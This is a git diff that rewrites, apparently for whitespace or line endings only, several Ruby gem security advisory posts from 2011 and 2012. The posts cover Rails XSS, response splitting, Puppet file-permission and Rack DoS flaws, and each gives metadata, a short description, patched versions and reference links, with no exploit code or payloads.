diff --git a/advisories/_posts/2011-08-16-CVE-2011-3186.md b/advisories/_posts/2011-08-16-CVE-2011-3186.md
index 33e69265..196a8dfb 100644
--- a/advisories/_posts/2011-08-16-CVE-2011-3186.md
+++ b/advisories/_posts/2011-08-16-CVE-2011-3186.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2011-3186 (actionpack): Response Splitting Vulnerability in Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-3186
-  osvdb: 74616
-  ghsa: fcqf-h4h4-695m
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/b_yTveAph2g
-  title: Response Splitting Vulnerability in Ruby on Rails
-  date: 2011-08-16
-  description: |
-    A response splitting flaw in Ruby on Rails 2.3.x was reported that could allow
-    a remote attacker to inject arbitrary HTTP headers into a response due to
-    insufficient sanitization of the values provided for response content types.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 2.3.13"
----
+---
+layout: advisory
+title: 'CVE-2011-3186 (actionpack): Response Splitting Vulnerability in Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-3186
+  osvdb: 74616
+  ghsa: fcqf-h4h4-695m
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/b_yTveAph2g
+  title: Response Splitting Vulnerability in Ruby on Rails
+  date: 2011-08-16
+  description: |
+    A response splitting flaw in Ruby on Rails 2.3.x was reported that could allow
+    a remote attacker to inject arbitrary HTTP headers into a response due to
+    insufficient sanitization of the values provided for response content types.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 2.3.13"
+---
diff --git a/advisories/_posts/2011-09-01-CVE-2011-4969.md b/advisories/_posts/2011-09-01-CVE-2011-4969.md
index 7aa332a2..56a84a28 100644
--- a/advisories/_posts/2011-09-01-CVE-2011-4969.md
+++ b/advisories/_posts/2011-09-01-CVE-2011-4969.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2011-4969 (jquery-rails): jQuery vulnerable to Cross-Site Scripting (XSS)'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2011-4969
-  ghsa: 579v-mp3v-rrw5
-  url: http://blog.jquery.com/2011/09/01/jquery-1-6-3-released
-  title: jQuery vulnerable to Cross-Site Scripting (XSS)
-  date: 2011-09-01
-  description: |
-    Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3,
-    when using location.hash to select elements, allows remote attackers
-    to inject arbitrary web script or HTML via a crafted tag.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 1.6.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-4969
-    - http://blog.jquery.com/2011/09/01/jquery-1-6-3-released
-    - http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html
-    - http://bugs.jquery.com/ticket/9521
-    - https://github.com/jquery/jquery/commit/db9e023e62c1ff5d8f21ed9868ab6878da2005e9
-    - https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8
-    - https://security.netapp.com/advisory/ntap-20190416-0007
-    - http://www.openwall.com/lists/oss-security/2013/01/31/3
-    - http://www.ubuntu.com/usn/USN-1722-1
-    - https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450224
-    - https://github.com/advisories/GHSA-579v-mp3v-rrw5
----
+---
+layout: advisory
+title: 'CVE-2011-4969 (jquery-rails): jQuery vulnerable to Cross-Site Scripting (XSS)'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2011-4969
+  ghsa: 579v-mp3v-rrw5
+  url: http://blog.jquery.com/2011/09/01/jquery-1-6-3-released
+  title: jQuery vulnerable to Cross-Site Scripting (XSS)
+  date: 2011-09-01
+  description: |
+    Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3,
+    when using location.hash to select elements, allows remote attackers
+    to inject arbitrary web script or HTML via a crafted tag.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 1.6.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4969
+    - http://blog.jquery.com/2011/09/01/jquery-1-6-3-released
+    - http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html
+    - http://bugs.jquery.com/ticket/9521
+    - https://github.com/jquery/jquery/commit/db9e023e62c1ff5d8f21ed9868ab6878da2005e9
+    - https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8
+    - https://security.netapp.com/advisory/ntap-20190416-0007
+    - http://www.openwall.com/lists/oss-security/2013/01/31/3
+    - http://www.ubuntu.com/usn/USN-1722-1
+    - https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450224
+    - https://github.com/advisories/GHSA-579v-mp3v-rrw5
+---
diff --git a/advisories/_posts/2011-09-01-OSVDB-97854.md b/advisories/_posts/2011-09-01-OSVDB-97854.md
index 966b9313..ab6ebdff 100644
--- a/advisories/_posts/2011-09-01-OSVDB-97854.md
+++ b/advisories/_posts/2011-09-01-OSVDB-97854.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'OSVDB-97854 (fog-dragonfly): Dragonfly Gem for Ruby on Windows Shell Escaping
-  Weakness'
-comments: false
-categories:
-- fog-dragonfly
-advisory:
-  gem: fog-dragonfly
-  osvdb: 97854
-  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20016
-  title: Dragonfly Gem for Ruby on Windows Shell Escaping Weakness
-  date: 2011-09-01
-  description: |
-    Dragonfly Gem for Ruby contains a flaw that is due to the program
-    failing to properly escape a shell that contains injected characters.
-    This may allow a context-dependent attacker to potentially execute
-    arbitrary commands.
-
-    This gem has been renamed. Please use "dragonfly" from now on.
-  patched_versions:
-  - ">= 0.9.6"
-  related:
-    url:
-    - https://github.com/markevans/dragonfly/blob/master/spec/dragonfly/shell_spec.rb#L26
-    - https://github.com/markevans/dragonfly/pull/506
-    - https://github.com/markevans/dragonfly/commit/f4f8e37a171a34f0ef3a6d80b52f44ed4d66d3bc
-    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20016
-    - http://osvdb.org/show/osvdb/97854
----
+---
+layout: advisory
+title: 'OSVDB-97854 (fog-dragonfly): Dragonfly Gem for Ruby on Windows Shell Escaping
+  Weakness'
+comments: false
+categories:
+- fog-dragonfly
+advisory:
+  gem: fog-dragonfly
+  osvdb: 97854
+  url: https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20016
+  title: Dragonfly Gem for Ruby on Windows Shell Escaping Weakness
+  date: 2011-09-01
+  description: |
+    Dragonfly Gem for Ruby contains a flaw that is due to the program
+    failing to properly escape a shell that contains injected characters.
+    This may allow a context-dependent attacker to potentially execute
+    arbitrary commands.
+
+    This gem has been renamed. Please use "dragonfly" from now on.
+  patched_versions:
+  - ">= 0.9.6"
+  related:
+    url:
+    - https://github.com/markevans/dragonfly/blob/master/spec/dragonfly/shell_spec.rb#L26
+    - https://github.com/markevans/dragonfly/pull/506
+    - https://github.com/markevans/dragonfly/commit/f4f8e37a171a34f0ef3a6d80b52f44ed4d66d3bc
+    - https://security.snyk.io/vuln/SNYK-RUBY-DRAGONFLY-20016
+    - http://osvdb.org/show/osvdb/97854
+---
diff --git a/advisories/_posts/2011-09-20-OSVDB-115917.md b/advisories/_posts/2011-09-20-OSVDB-115917.md
index 17611972..25eda788 100644
--- a/advisories/_posts/2011-09-20-OSVDB-115917.md
+++ b/advisories/_posts/2011-09-20-OSVDB-115917.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-115917 (bundler): Bundler Gem for Ruby install Command Process Listing
-  Local Plaintext Credential Disclosure'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  osvdb: 115917
-  url: https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
-  title: Bundler Gem for Ruby install Command Process Listing Local Plaintext Credential
-    Disclosure
-  date: 2011-09-20
-  description: |
-    Bundler Gem for Ruby contains a flaw that is due to the program listing
-    credential information in plaintext in the install command process listing.
-    This may allow a local attacker to gain access to credential information.
-  patched_versions:
-  - ">= 1.1.rc"
-  related:
-    url:
-    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
-    - https://my.diffend.io/gems/bundler/versions/1.1.rc
-    - https://github.com/rubygems/bundler/commit/95bb14483cf8af857dc901c22db48cd3057d243e
-    - https://github.com/rubygems/bundler/pull/1463
-    - https://github.com/rubygems/bundler/issues/1440
-    - http://www.osvdb.org/show/osvdb/115917
----
+---
+layout: advisory
+title: 'OSVDB-115917 (bundler): Bundler Gem for Ruby install Command Process Listing
+  Local Plaintext Credential Disclosure'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  osvdb: 115917
+  url: https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
+  title: Bundler Gem for Ruby install Command Process Listing Local Plaintext Credential
+    Disclosure
+  date: 2011-09-20
+  description: |
+    Bundler Gem for Ruby contains a flaw that is due to the program listing
+    credential information in plaintext in the install command process listing.
+    This may allow a local attacker to gain access to credential information.
+  patched_versions:
+  - ">= 1.1.rc"
+  related:
+    url:
+    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
+    - https://my.diffend.io/gems/bundler/versions/1.1.rc
+    - https://github.com/rubygems/bundler/commit/95bb14483cf8af857dc901c22db48cd3057d243e
+    - https://github.com/rubygems/bundler/pull/1463
+    - https://github.com/rubygems/bundler/issues/1440
+    - http://www.osvdb.org/show/osvdb/115917
+---
diff --git a/advisories/_posts/2011-10-05-OSVDB-76011.md b/advisories/_posts/2011-10-05-OSVDB-76011.md
index 6dd9072c..510abdc7 100644
--- a/advisories/_posts/2011-10-05-OSVDB-76011.md
+++ b/advisories/_posts/2011-10-05-OSVDB-76011.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-76011 (spree): Spree Search ProductScope Class search[send][] Parameter
-  Arbitrary Command Execution'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 76011
-  url: https://web.archive.org/web/20121124215359/https://spreecommerce.com/blog/remote-command-product-group
-  title: Spree Search ProductScope Class search[send][] Parameter Arbitrary Command
-    Execution
-  date: 2011-10-05
-  description: |
-    The ProductScope class fails to properly sanitize user-supplied input via the
-    'search[send][]' parameter resulting in arbitrary command execution. With a
-    specially crafted request, a remote attacker can potentially cause arbitrary
-    command execution.
-  patched_versions:
-  - ">= 0.60.2"
-  related:
-    url:
-    - https://web.archive.org/web/20121124215359/https://spreecommerce.com/blog/remote-command-product-group
----
+---
+layout: advisory
+title: 'OSVDB-76011 (spree): Spree Search ProductScope Class search[send][] Parameter
+  Arbitrary Command Execution'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 76011
+  url: https://web.archive.org/web/20121124215359/https://spreecommerce.com/blog/remote-command-product-group
+  title: Spree Search ProductScope Class search[send][] Parameter Arbitrary Command
+    Execution
+  date: 2011-10-05
+  description: |
+    The ProductScope class fails to properly sanitize user-supplied input via the
+    'search[send][]' parameter resulting in arbitrary command execution. With a
+    specially crafted request, a remote attacker can potentially cause arbitrary
+    command execution.
+  patched_versions:
+  - ">= 0.60.2"
+  related:
+    url:
+    - https://web.archive.org/web/20121124215359/https://spreecommerce.com/blog/remote-command-product-group
+---
diff --git a/advisories/_posts/2011-10-27-CVE-2011-3870.md b/advisories/_posts/2011-10-27-CVE-2011-3870.md
index f5edf429..a9ef74b2 100644
--- a/advisories/_posts/2011-10-27-CVE-2011-3870.md
+++ b/advisories/_posts/2011-10-27-CVE-2011-3870.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2011-3870 (puppet): Puppet allows local users to modify the permissions
-  of arbitrary files'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2011-3870
-  ghsa: qh3g-27jf-3j54
-  url: https://puppet.com/security/cve/cve-2011-3870
-  title: Puppet allows local users to modify the permissions of arbitrary files
-  date: 2011-10-27
-  description: |
-    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x
-    allows local users to modify the permissions of arbitrary
-    files via a symlink attack on the SSH authorized_keys file.
-  cvss_v2: 6.3
-  patched_versions:
-  - "~> 2.6.11"
-  - ">= 2.7.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-3870
-    - https://puppet.com/security/cve/cve-2011-3870
-    - https://github.com/puppetlabs/puppet/commit/88512e880bd2a03694b5fef42540dc7b3da05d30
-    - https://github.com/puppetlabs/puppet/commit/b29b1785d543a3cea961fffa9b3c15f14ab7cce0
-    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
-    - http://www.debian.org/security/2011/dsa-2314
-    - http://www.ubuntu.com/usn/USN-1223-1
-    - http://www.ubuntu.com/usn/USN-1223-2
-    - https://github.com/advisories/GHSA-qh3g-27jf-3j54
----
+---
+layout: advisory
+title: 'CVE-2011-3870 (puppet): Puppet allows local users to modify the permissions
+  of arbitrary files'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2011-3870
+  ghsa: qh3g-27jf-3j54
+  url: https://puppet.com/security/cve/cve-2011-3870
+  title: Puppet allows local users to modify the permissions of arbitrary files
+  date: 2011-10-27
+  description: |
+    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x
+    allows local users to modify the permissions of arbitrary
+    files via a symlink attack on the SSH authorized_keys file.
+  cvss_v2: 6.3
+  patched_versions:
+  - "~> 2.6.11"
+  - ">= 2.7.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-3870
+    - https://puppet.com/security/cve/cve-2011-3870
+    - https://github.com/puppetlabs/puppet/commit/88512e880bd2a03694b5fef42540dc7b3da05d30
+    - https://github.com/puppetlabs/puppet/commit/b29b1785d543a3cea961fffa9b3c15f14ab7cce0
+    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
+    - http://www.debian.org/security/2011/dsa-2314
+    - http://www.ubuntu.com/usn/USN-1223-1
+    - http://www.ubuntu.com/usn/USN-1223-2
+    - https://github.com/advisories/GHSA-qh3g-27jf-3j54
+---
diff --git a/advisories/_posts/2011-10-27-CVE-2011-3871.md b/advisories/_posts/2011-10-27-CVE-2011-3871.md
index 3d0b7927..d02227c6 100644
--- a/advisories/_posts/2011-10-27-CVE-2011-3871.md
+++ b/advisories/_posts/2011-10-27-CVE-2011-3871.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2011-3871 (puppet): Puppet uses predictable filenames, allowing arbitrary
-  file overwrite'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2011-3871
-  ghsa: mpmx-gm5v-q789
-  url: https://puppet.com/security/cve/cve-2011-3871
-  title: Puppet uses predictable filenames, allowing arbitrary file overwrite
-  date: 2011-10-27
-  description: |
-    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x,
-    when running in `--edit` mode, uses a predictable file name, which
-    allows local users to run arbitrary Puppet code or trick a user
-    into editing arbitrary files.
-  cvss_v2: 6.2
-  patched_versions:
-  - "~> 2.6.11"
-  - ">= 2.7.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-3871
-    - https://puppet.com/security/cve/cve-2011-3871
-    - https://github.com/puppetlabs/puppet/commit/343c7bd381b63e042d437111718918f951d9b30d
-    - https://github.com/puppetlabs/puppet/commit/d76c30935460ded953792dfe49f72b8c5158e899
-    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
-    - http://www.debian.org/security/2011/dsa-2314
-    - http://www.ubuntu.com/usn/USN-1223-1
-    - http://www.ubuntu.com/usn/USN-1223-2
-    - https://github.com/advisories/GHSA-mpmx-gm5v-q789
----
+---
+layout: advisory
+title: 'CVE-2011-3871 (puppet): Puppet uses predictable filenames, allowing arbitrary
+  file overwrite'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2011-3871
+  ghsa: mpmx-gm5v-q789
+  url: https://puppet.com/security/cve/cve-2011-3871
+  title: Puppet uses predictable filenames, allowing arbitrary file overwrite
+  date: 2011-10-27
+  description: |
+    Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x,
+    when running in `--edit` mode, uses a predictable file name, which
+    allows local users to run arbitrary Puppet code or trick a user
+    into editing arbitrary files.
+  cvss_v2: 6.2
+  patched_versions:
+  - "~> 2.6.11"
+  - ">= 2.7.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-3871
+    - https://puppet.com/security/cve/cve-2011-3871
+    - https://github.com/puppetlabs/puppet/commit/343c7bd381b63e042d437111718918f951d9b30d
+    - https://github.com/puppetlabs/puppet/commit/d76c30935460ded953792dfe49f72b8c5158e899
+    - http://groups.google.com/group/puppet-announce/browse_thread/thread/91e3b46d2328a1cb
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068053.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068061.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-October/068093.html
+    - http://www.debian.org/security/2011/dsa-2314
+    - http://www.ubuntu.com/usn/USN-1223-1
+    - http://www.ubuntu.com/usn/USN-1223-2
+    - https://github.com/advisories/GHSA-mpmx-gm5v-q789
+---
diff --git a/advisories/_posts/2011-12-28-CVE-2011-5036.md b/advisories/_posts/2011-12-28-CVE-2011-5036.md
index 2ec8a99a..690a1291 100644
--- a/advisories/_posts/2011-12-28-CVE-2011-5036.md
+++ b/advisories/_posts/2011-12-28-CVE-2011-5036.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2011-5036 (rack): CVE-2011-5036 rubygem-rack: hash table collisions DoS
-  (oCERT-2011-003)'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2011-5036
-  osvdb: 78121
-  ghsa: v6j3-7jrw-hq2p
-  url: https://nvd.nist.gov/vuln/detail/CVE-2011-5036
-  title: 'CVE-2011-5036 rubygem-rack: hash table collisions DoS (oCERT-2011-003)'
-  date: 2011-12-28
-  description: |
-    Rack before 1.1.3, 1.2.x before 1.2.5, and 1.3.x before 1.3.6 computes
-    hash values for form parameters without restricting the ability to trigger hash
-    collisions predictably, which allows remote attackers to cause a denial of service
-    (CPU consumption) by sending many crafted parameters.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 1.1.3"
-  - "~> 1.2.5"
-  - "~> 1.3.6"
-  - ">= 1.4.0"
----
+---
+layout: advisory
+title: 'CVE-2011-5036 (rack): CVE-2011-5036 rubygem-rack: hash table collisions DoS
+  (oCERT-2011-003)'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2011-5036
+  osvdb: 78121
+  ghsa: v6j3-7jrw-hq2p
+  url: https://nvd.nist.gov/vuln/detail/CVE-2011-5036
+  title: 'CVE-2011-5036 rubygem-rack: hash table collisions DoS (oCERT-2011-003)'
+  date: 2011-12-28
+  description: |
+    Rack before 1.1.3, 1.2.x before 1.2.5, and 1.3.x before 1.3.6 computes
+    hash values for form parameters without restricting the ability to trigger hash
+    collisions predictably, which allows remote attackers to cause a denial of service
+    (CPU consumption) by sending many crafted parameters.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 1.1.3"
+  - "~> 1.2.5"
+  - "~> 1.3.6"
+  - ">= 1.4.0"
+---
diff --git a/advisories/_posts/2012-02-01-CVE-2012-6135.md b/advisories/_posts/2012-02-01-CVE-2012-6135.md
index 1c7d271c..b0cb7a53 100644
--- a/advisories/_posts/2012-02-01-CVE-2012-6135.md
+++ b/advisories/_posts/2012-02-01-CVE-2012-6135.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2012-6135 (passenger): Phusion Passenger Gem for Ruby Arbitrary File Deletion'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2012-6135
-  osvdb: 90738
-  ghsa: 8mw8-j583-vqfg
-  url: http://old.blog.phusion.nl/2013/03/05/phusion-passenger-4-0-beta-1-and-2-arbitrary-file-deletion-vulnerability/
-  title: Phusion Passenger Gem for Ruby Arbitrary File Deletion
-  date: 2012-02-01
-  description: |
-    Phusion Passenger Gem for Ruby contains a flaw that is triggered during
-    application startup. This issue may allow a local attacker to delete arbitrary files
-    via an application process. If the program has completed the start up process this
-    vulnerability is no longer exploitable.
-  cvss_v2: 2.1
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0.beta"
-  patched_versions:
-  - ">= 4.0.0"
----
+---
+layout: advisory
+title: 'CVE-2012-6135 (passenger): Phusion Passenger Gem for Ruby Arbitrary File Deletion'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2012-6135
+  osvdb: 90738
+  ghsa: 8mw8-j583-vqfg
+  url: http://old.blog.phusion.nl/2013/03/05/phusion-passenger-4-0-beta-1-and-2-arbitrary-file-deletion-vulnerability/
+  title: Phusion Passenger Gem for Ruby Arbitrary File Deletion
+  date: 2012-02-01
+  description: |
+    Phusion Passenger Gem for Ruby contains a flaw that is triggered during
+    application startup. This issue may allow a local attacker to delete arbitrary files
+    via an application process. If the program has completed the start up process this
+    vulnerability is no longer exploitable.
+  cvss_v2: 2.1
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0.beta"
+  patched_versions:
+  - ">= 4.0.0"
+---
diff --git a/advisories/_posts/2012-02-29-CVE-2012-6684.md b/advisories/_posts/2012-02-29-CVE-2012-6684.md
index ac979ed0..84bdcfd9 100644
--- a/advisories/_posts/2012-02-29-CVE-2012-6684.md
+++ b/advisories/_posts/2012-02-29-CVE-2012-6684.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2012-6684 (RedCloth): CVE-2012-6684 rubygem-RedCloth: XSS vulnerability'
-comments: false
-categories:
-- RedCloth
-advisory:
-  gem: RedCloth
-  cve: 2012-6684
-  ghsa: r23g-3qw4-gfh2
-  osvdb: 115941
-  url: https://co3k.org/blog/redcloth-unfixed-xss-en
-  title: 'CVE-2012-6684 rubygem-RedCloth: XSS vulnerability'
-  date: 2012-02-29
-  description: |
-    Cross-site scripting (XSS) vulnerability in the RedCloth library 4.2.9
-    for Ruby and earlier allows remote attackers to inject arbitrary
-    web script or HTML via a javascript: URI.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 4.3.0"
-  related:
-    url:
-    - http://co3k.org/blog/redcloth-unfixed-xss-en
-    - https://gist.github.com/co3k/75b3cb416c342aa1414c
-    - https://github.com/jgarber/redcloth/commit/2f6dab4d6aea5cee778d2f37a135637fe3f1573c
-    - https://github.com/jgarber/redcloth/commit/b24f03db023d1653d60dd33b28e09317cd77c6a0
-    - https://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
-    - https://web.archive.org/web/20150128115714/http://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-6684
-    - https://github.com/advisories/GHSA-r23g-3qw4-gfh2
-    - http://seclists.org/fulldisclosure/2014/Dec/50
-    - http://www.debian.org/security/2015/dsa-3168
----
+---
+layout: advisory
+title: 'CVE-2012-6684 (RedCloth): CVE-2012-6684 rubygem-RedCloth: XSS vulnerability'
+comments: false
+categories:
+- RedCloth
+advisory:
+  gem: RedCloth
+  cve: 2012-6684
+  ghsa: r23g-3qw4-gfh2
+  osvdb: 115941
+  url: https://co3k.org/blog/redcloth-unfixed-xss-en
+  title: 'CVE-2012-6684 rubygem-RedCloth: XSS vulnerability'
+  date: 2012-02-29
+  description: |
+    Cross-site scripting (XSS) vulnerability in the RedCloth library 4.2.9
+    for Ruby and earlier allows remote attackers to inject arbitrary
+    web script or HTML via a javascript: URI.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 4.3.0"
+  related:
+    url:
+    - http://co3k.org/blog/redcloth-unfixed-xss-en
+    - https://gist.github.com/co3k/75b3cb416c342aa1414c
+    - https://github.com/jgarber/redcloth/commit/2f6dab4d6aea5cee778d2f37a135637fe3f1573c
+    - https://github.com/jgarber/redcloth/commit/b24f03db023d1653d60dd33b28e09317cd77c6a0
+    - https://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
+    - https://web.archive.org/web/20150128115714/http://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-6684
+    - https://github.com/advisories/GHSA-r23g-3qw4-gfh2
+    - http://seclists.org/fulldisclosure/2014/Dec/50
+    - http://www.debian.org/security/2015/dsa-3168
+---
diff --git a/advisories/_posts/2012-03-01-CVE-2012-1098.md b/advisories/_posts/2012-03-01-CVE-2012-1098.md
index 951ae787..7f218231 100644
--- a/advisories/_posts/2012-03-01-CVE-2012-1098.md
+++ b/advisories/_posts/2012-03-01-CVE-2012-1098.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2012-1098 (activesupport): CVE-2012-1098 rubygem-activesupport: XSS in
-  SafeBuffer#[] (unescaped safe buffers can be marked as safe)'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2012-1098
-  osvdb: 79726
-  ghsa: qv8p-v9qw-wc7g
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-1098
-  title: 'CVE-2012-1098 rubygem-activesupport: XSS in SafeBuffer#[] (unescaped safe
-    buffers can be marked as safe)'
-  date: 2012-03-01
-  description: |
-    Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before
-    3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject
-    arbitrary web script or HTML via vectors involving a SafeBuffer object that is manipulated
-    through certain methods.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 3.0.12"
-  - "~> 3.1.4"
-  - ">= 3.2.2"
----
+---
+layout: advisory
+title: 'CVE-2012-1098 (activesupport): CVE-2012-1098 rubygem-activesupport: XSS in
+  SafeBuffer#[] (unescaped safe buffers can be marked as safe)'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2012-1098
+  osvdb: 79726
+  ghsa: qv8p-v9qw-wc7g
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-1098
+  title: 'CVE-2012-1098 rubygem-activesupport: XSS in SafeBuffer#[] (unescaped safe
+    buffers can be marked as safe)'
+  date: 2012-03-01
+  description: |
+    Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before
+    3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject
+    arbitrary web script or HTML via vectors involving a SafeBuffer object that is manipulated
+    through certain methods.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 3.0.12"
+  - "~> 3.1.4"
+  - ">= 3.2.2"
+---
diff --git a/advisories/_posts/2012-03-01-CVE-2012-1099.md b/advisories/_posts/2012-03-01-CVE-2012-1099.md
index 4ff121c1..6edfdf78 100644
--- a/advisories/_posts/2012-03-01-CVE-2012-1099.md
+++ b/advisories/_posts/2012-03-01-CVE-2012-1099.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2012-1099 (actionpack): CVE-2012-1099 rubygem-actionpack: XSS in the "select"
-  helper'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-1099
-  osvdb: 79727
-  ghsa: 2xjj-5x6h-8vmf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-1099
-  title: 'CVE-2012-1099 rubygem-actionpack: XSS in the "select" helper'
-  date: 2012-03-01
-  description: |
-    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_options_helper.rb
-    in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and
-    3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML
-    via vectors involving certain generation of OPTION elements within SELECT elements.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.0.12"
-  - "~> 3.1.4"
-  - ">= 3.2.2"
----
+---
+layout: advisory
+title: 'CVE-2012-1099 (actionpack): CVE-2012-1099 rubygem-actionpack: XSS in the "select"
+  helper'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-1099
+  osvdb: 79727
+  ghsa: 2xjj-5x6h-8vmf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-1099
+  title: 'CVE-2012-1099 rubygem-actionpack: XSS in the "select" helper'
+  date: 2012-03-01
+  description: |
+    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_options_helper.rb
